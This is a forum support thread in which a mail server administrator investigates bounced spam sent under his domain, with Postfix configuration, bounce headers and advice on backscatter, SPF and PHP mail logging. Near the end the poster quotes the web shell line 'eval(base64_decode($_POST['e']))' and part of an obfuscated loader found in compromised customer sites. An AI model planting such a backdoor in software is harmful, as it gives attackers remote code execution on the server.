Hello, i have problem with sending spam. Everyday i received info in style "Undelivered Mail Returned to Sender". "Return" emails are from external mail servers. In "return email" i received .eml file, where i can find info, that sender is f.e. [email protected] where "agnes_boyd" is not my username, but mydomain.com = is my correct and actuall domain. Code: Return-Path: <[email protected]> Received: from mydomain.com (hosting.mydomain.com [my.ip.address]) by a2-selva6.bol.com.br (Postfix) with ESMTP id 3kLZbX1hP2zKLbDY for <[email protected]>; Mon, 12 Jan 2015 10:53:26 -0200 (BRST) Please help me, what can be wrong. In log i don't see sending emails, i only receive not deliver emails or bounced emails (after send) from external mail servers. main.cf looks ok, below part of main.cf Code: smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_non_fqdn_helo_hostname, reject_invalid_helo_hostname, reject_unknown_helo_hostname smtpd_delay_reject = yes smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination, reject_unknown_sender_domain, reject_non_fqdn_recipient,check_recipient_access mysql:/etc/postfix/mysql-virtual_recipient.cf, reject_unknown_recipient_domain, check_policy_service inet:127.0.0.1:10023, reject_rbl_client xbl.spamhaus.org, reject_rbl_client bl.spamcop.net mtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_non_fqdn_helo_hostname, reject_invalid_helo_hostname, reject_unknown_helo_hostname smtpd_delay_reject = yes smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination, reject_unknown_sender_domain, reject_non_fqdn_recipient,check_recipient_access mysql:/etc/postfix/mysql-virtumtpd_tls_security_level = may transport_maps = hash:/var/lib/mailman/data/transport-mailman, proxy:mysql:/etc/postfix/mysql-virtual_transports.cf relay_domains = mysql:/etc/postfix/mysql-virtual_relaydomains.cf relay_recipient_maps = mysql:/etc/postfix/mysql-virtual_relayrecipientmaps.cf proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks smtpd_client_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unknown_client_hostname, check_client_access mysql:/etc/postfix/mysql-virtual_client.cf, reject_rbl_client cbl.abuseat.org On ISPConfig i have few domains, and only for one i have this problems. From another domains i have no emails in this style.
Can somebody help me ? I recognized, that when i add f.e. this non-exist email [email protected] into blacklist -> problem for this e-mail addr gone. But i receive 4 next undelivery emails from new non-exist emails.... Please, how to solved. Nothing in queue, nothing in logs about send emails. What is wrong ?
But this does not mean that your server has send the email. It just means that the sender used your domain as from address.
But undeliverable emails, which i received, have source like below with use my IP and my domain :/ "lula_holmes" is next non-exist mailbox. Code: Received: from na01-bl2-obe.outbound.protection.outlook.com (207.46.163.207) by CIO-KRC-HT01.osuad.osu.edu (164.107.81.37) with Microsoft SMTP Server (TLS) id 14.3.174.1; Thu, 15 Jan 2015 00:23:16 -0500 Received: from BY2FFO11FD027.protection.gbl (10.1.14.31) by BY2FFO11HUB036.protection.gbl (10.1.14.179) with Microsoft SMTP Server (TLS) id 15.1.49.13; Thu, 15 Jan 2015 05:23:14 +0000 Received: from MYDOMAIN.COM (MY SRV IP) by BY2FFO11FD027.mail.protection.outlook.com (10.1.15.216) with Microsoft SMTP Server id 15.1.59.14 via Frontend Transport; Thu, 15 Jan 2015 05:23:13 +0000 Date: Thu, 15 Jan 2015 06:23:11 +0100 From: Lula Holmes [EMAIL][email protected][/EMAIL] Reply-To: Lula Holmes [EMAIL][email protected][/EMAIL] Message-ID: [EMAIL][email protected][/EMAIL] To: <[email protected]> Subject: Fw: Elena Grimaldi - Anal Threesome MMF
LOL, I love the subject at the bottom of the snippet. As Till said, nothing you have stated or provided so far indicates that these emails are in fact being sent from your server. Just because you receive an email message with "Undelivered Mail Returned to Sender", it does not mean that your server sent the original message. As Till suggested, it would be trivial to forge these messages. This is a common spamming technique known as "back-scatter". See: http://its.fsu.edu/Email/Spam-Virus-Email-Filtering/Spoofing-backscatter I recommend that you implement appropriate spam-filtering mechanisms on the server in question, namely, clamav, Amavis, and SpamAssassin. And, ideally, postgrey and SPF-checking.
Hi, Thanks for answers. I already implement amavis and postgrey on the server and messages still come. So it's normally then my srv sometimes is on blacklist because of this spam messages - once per month ?
And what about SpamAssassin and SPF-checking? Also, your server shouldn't be blacklisted because of this. You are receiving these bogus emails, not sending them. Correct?
Correct, because i don't see these emails in mail log. If i send from my account email -> i see this in mail log. SpamAssassin -> incoming email headers are with ***SPAM*** or bounced. Today i received email: Code: Received-SPF: Fail (protection.outlook.com: domain of MYDOMAIN does not designate 207.46.163.185 as permitted sender) So SPF checking works. But for some emails i have: Code: Received: from BLUPR08CA0042.namprd08.prod.outlook.com (10.141.200.22) by BL2PR08MB065.namprd08.prod.outlook.com (10.242.196.12) with Microsoft SMTP Server (TLS) id 15.1.59.20; Mon, 19 Jan 2015 12:50:49 +0000 Received: from BY2FFO11FD004.protection.gbl (2a01:111:f400:7c0c::156) by BLUPR08CA0042.outlook.office365.com (2a01:111:e400:88d::22) with Microsoft SMTP Server (TLS) id 15.1.59.20 via Frontend Transport; Mon, 19 Jan 2015 12:50:49 +0000 Received: from MYDOMAIN (MY IP) by BY2FFO11FD004.mail.protection.outlook.com (10.1.14.158) with Microsoft SMTP Server id 15.1.75.11 via Frontend Transport; Mon, 19 Jan 2015 12:50:48 +0000 Date: Mon, 19 Jan 2015 13:50:47 +0100 From: Stacie Mcbride <stacie_mcbride@MYDOMAIN> Reply-To: "Stacie Mcbride" <stacie_mcbride@MYDOMAIN> Message-ID: <14b32d7-e3243-5b@MYDOMAIN> To: <[email protected]> Subject: FW: Hi, A daily updated list showing a variety of free ******* picture and movie galleries X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Return-Path: stacie_mcbride@MYDOMAIN X-EOPAttributedMessage: 0 Received-SPF: Pass (protection.outlook.com: domain of MYDOMAIN designates MY IP as permitted sender) receiver=protection.outlook.com; client-ip=MY IP; helo=MY DOMAIN; Authentication-Results: spf=pass (sender IP is MY IP) smtp.mailfrom=stacie_mcbride@MY DOMAIN; und.nodak.edu; dkim=none (message not signed) header.d=none;und.nodak.edu; dmarc=permerror action=none header.from=MY DOMAIN; So it looks like these emails can be from my srv but not in logs ? :/
Okay, good to see that SpamAssassin flags the forged bounce messages as spam, and that SPF-checking seems to work. Given the rest of what you said, perhaps you have a compromised PHP script or similar that is allowing somebody to send mail from your server. I see this problem with compromised WordPress installations all the time. If a PHP script is responsible for sending the mail, it is possible that you will not have much (if any) evidence in your Postfix logs. Two things I would do immediately: 1.) Modify your PHP configuration such that all mail activity is logged. 2.) Modify your PHP configuration such that the user under which the PHP process is running when mail is sent is included in the message headers. If these messages really are being sent from your server, these two measures will help immensely in tracking-down the source. While I have not implemented it myself, this subject is discussed at length in https://www.howtoforge.com/how-to-log-emails-sent-with-phps-mail-function-to-detect-form-spam , which is probably worth a read. Curious to see what you find...
I already read this and implement this info. So now i'm waiting for logs. BTW, if we talk about PHP mail function, is already disabled (in last year) in ISPConfig portal in "Option" for this domain: Is this correct ?
Thats correct but in your case ist just complicates the problem, if the spammesr would use the mail functions, you would be able to identify the spam in mail.log and also see the sending script in the mail headers. But when the function is disabled, the spammers have to upload their own smtp library to send mail and thats not esy to detec as you wont get any logs in that case and even the log script wont show anything. What you ca try to find the sending script with lsof, but this will give only useful results when you catch it while it is currently sending.
Unfortunatelly via mail function, nothing in logs :/ (test email via test.php was in log, so log works correctly). But i think i solved problems. I check customers websites and in one log i found some errors in php sites. Deeper -> i found in .php which generate error lines: Code: eval(base64_decode($_POST['e'])); Code: return base64_decode($vNS0QU3);} $v0O2K6T = '60dVYaTfKb3mXvSkdv2lKz1ETRCgR1ikPZPRh5fUO8qV9IhGLDoq9EqV9IqbYRxmwanYwDxZK'. 'MPIwr5Vgt9EdtZuYOnYwDxZKMPI0E9ETt3AXag8tPn8dvCfdvn8tRx2wrxj'. 'D8xVT03uXEi8dt3f34FkT0S4XvFfYa3fKMfCXzfQTRVZKMPIYRZjDb5YDM3ndt3Iw133P1xVJquVwaiAdMpmdExZh5Ahh12gOA9h'. 'wr5VL4hjD8xVKaP8Xzf4wDFrhZpzwr5VwfpEtzo8equVwaiAdMpmdExZTz2kTzP8W0KVURxqequVwaiAdM'. 'pmdExZFzP8W0W7WtFqWtgVwDxVwr5V9vP46zcbequVwaiAdMpmdExZTz2kWMPEKDx2wzTCXa3f'. 'equVwaiAdMpmdExZPzflT02AWDxVwDxVwDxVwr5VLOhjD8xVKaP8Xzf4wDFh60AfXzfl6tgVwDxVwDxVURx'. 'ILrnYwDiqW09n60LV91TfKb3mXvoVwDxVwDxVwDx2wDKAs4wG38KjD8xVKa'. '97WzP4WzPZwDFIXtFqtv37XMojD8xVKa97WzP4WzPZwDFfKb97K4'. 'nYwDiqKM25T035T0gV9zCfXz2kKbinJOnYwDiqKM25T035T0gVTbPGdHFmXvoVT0FfdbPbYDFIWawm'. 'wanYwDxVwa3H6tF46Dxu9aFu6tLlUZFfdbPbXHP5KaP5YRijD8xVwDxVwz3CKvhV9vPEKM2Etvp7TE'. etc etc etc. with 1510 lines. I delete these .php files and problem with spam gone. From yesterday no "undeliverable" emails
